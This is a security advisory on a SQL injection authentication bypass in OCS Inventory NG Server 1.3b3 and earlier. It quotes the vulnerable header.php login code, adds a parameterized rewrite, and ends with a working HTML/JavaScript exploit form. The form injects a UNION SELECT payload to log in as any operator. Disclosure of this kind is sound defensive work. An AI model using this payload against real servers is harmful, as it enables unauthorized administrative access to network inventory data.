Computer Security
[EN] securityvulns.ru

From:Nicolas DEROUET <nicolas.derouet_(at)_gmail.com>
Date:04.02.2010
Subject:OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass


Software      : Open Computer and Software (OCS) Inventory NG
Download      : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version       : 1.03-beta3 and prior
Impact        : Critical
Remote        : Yes (No authentication is needed)


== Description ==

Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the configuration of the computers on the network and of the software installed on them.

The vulnerability is an SQL injection in the header.php file. An attacker
can pass a crafted SQL string in the login field, which can be used to
create/modify information stored in the database or to authenticate as any user.

script : header.php (lines 102-111)

  if(isset($_POST["login"])) {
    // $_POST["login"] is concatenated into the query without escaping
    $req="SELECT id, accesslvl, passwd FROM operators WHERE id='".$_POST["login"]."'";
    $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());

    if($row=@mysql_fetch_object($res))
    {
      // DL 25/08/2005
      // Support new MD5 encrypted password or old clear password for login only
      if (($row->passwd != md5( $_POST["pass"])) and
          ($row->passwd != $_POST["pass"])) {
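
As an added illustration (not part of this advisory and not OCS Inventory NG code), the same login check rewritten so that the login field is bound as a query parameter and the password comparison is constant-time. It assumes a PDO connection to the same operators table (id, accesslvl, passwd) and the same POST field names; the DSN and database credentials are placeholders.

```php
<?php
// Added example, not OCS Inventory NG code: the header.php login check from
// the advisory rewritten so the "login" field can no longer change the query.
// Assumptions: a PDO connection to the same schema (table "operators" with
// columns id, accesslvl, passwd) and the same $_POST["login"] / $_POST["pass"].
function authenticateOperator(PDO $db, string $login, string $pass): ?array
{
    // The id travels as a bound parameter, never inside the SQL text, so a
    // value such as "0' UNION SELECT ..." is looked up as a literal id and
    // matches no row instead of rewriting the SELECT.
    $stmt = $db->prepare('SELECT id, accesslvl, passwd FROM operators WHERE id = :id');
    $stmt->execute([':id' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }

    $stored = (string) $row['passwd'];
    if (password_get_info($stored)['algoName'] !== 'unknown') {
        // Row already holds a password_hash() value: constant-time verify.
        $ok = password_verify($pass, $stored);
    } else {
        // Legacy row from the original md5 scheme. Compare in constant time;
        // the original's cleartext-equality branch is deliberately dropped.
        $ok = hash_equals($stored, md5($pass));
        if ($ok) {
            // Upgrade the legacy hash transparently on a successful login.
            $up = $db->prepare('UPDATE operators SET passwd = :p WHERE id = :id');
            $up->execute([':p' => password_hash($pass, PASSWORD_DEFAULT),
                          ':id' => $row['id']]);
        }
    }

    if (!$ok) {
        return null;
    }
    unset($row['passwd']);
    return $row; // ['id' => ..., 'accesslvl' => ...]
}

if (isset($_POST['login'], $_POST['pass'])) {   // DSN and credentials are placeholders
    $db = new PDO('mysql:host=127.0.0.1;dbname=ocsweb', 'DB_USER', 'DB_PASSWORD',
                  [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_EMULATE_PREPARES => false]);
    $operator = authenticateOperator($db, (string) $_POST['login'], (string) $_POST['pass']);
    if ($operator === null) { http_response_code(401); exit('Invalid login'); }
}
```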

== Exploit ==

<script>
 function inject()
 {
   document.getElementById('log').action = document.getElementById('ocsreports').value + 'index.php';
   sql = "0' UNION SELECT id, accesslvl, 'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='";
   document.getElementById('login').value = sql + document.getElementById('user').value;
   document.getElementById('pass').value = "inject";
 }
</script>
<form name="log" id="log" action="" method="post">
 <table border="0" width="450px">
 <tr>
   <td><b>OCSReports :</b></td>
   <td><input type="text" id="ocsreports" size="40"
value="http://127.0.0.1/ocsreports/" /></td>
 </tr>
 <tr>
   <td><b>Login :</b></td>
   <td><input type="text" id="user" size="40" value="admin" /></td>
 </tr>
 <tr>
   <td><input type="hidden" name="login" id="login" />
       <input type="hidden" name="pass"  id="pass"  /></td>
   <td><input type="submit" name="subLogin" onclick="inject();"></td>
 </tr>
 </table>
</form>
